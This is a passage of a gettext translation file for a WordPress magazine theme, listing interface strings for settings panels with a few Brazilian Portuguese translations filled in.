msgid "Select number of posts to show at once." msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as " "Settings default." msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/header.php:115 msgid "" "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the " "single post page." msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to " "add widgets to footer sections." msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be " "same dimensions with the site logo." msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It " "should be same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed " "extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:714 msgid "" "Select posts per page for the blog. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank " "to set the default." msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized " "for SEO and appear better on the search engines." msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can " "enable/disable this part per module via Modules Design section." msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all " "sidebars." msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the " "desktop device." msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the " "mobile device." msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the " "tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set " "as default." msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website " "a the first time." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/design.php:231 msgid "" "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "Compartilhar" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave " "blank if you use 3rd plugins." msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change " "the font size of your text." msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 #: includes/menu.php:297 templates/header/templates.php:701 #: templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" #: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/single-post.php:1492 msgid "" "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "Mostrando %s resultados para sua pesquisa" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "Entrar" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "Sair" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr "" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not " "plan to use it." msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some " "different keywords." msgstr "" "Desculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente " "novamente com algumas palavras-chave diferentes." #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin." " Contact the administrator of this site for help on getting the plugin " "activated." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "Fontes:" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" #: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll " "find them all here." msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/panels/single-post.php:1582 msgid "" "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/newsletter.php:43 msgid "" "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "Tags" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme " "provides other ways for you to add any info into the header template via " "HTML, text and button and other blocks." msgstr "" #: 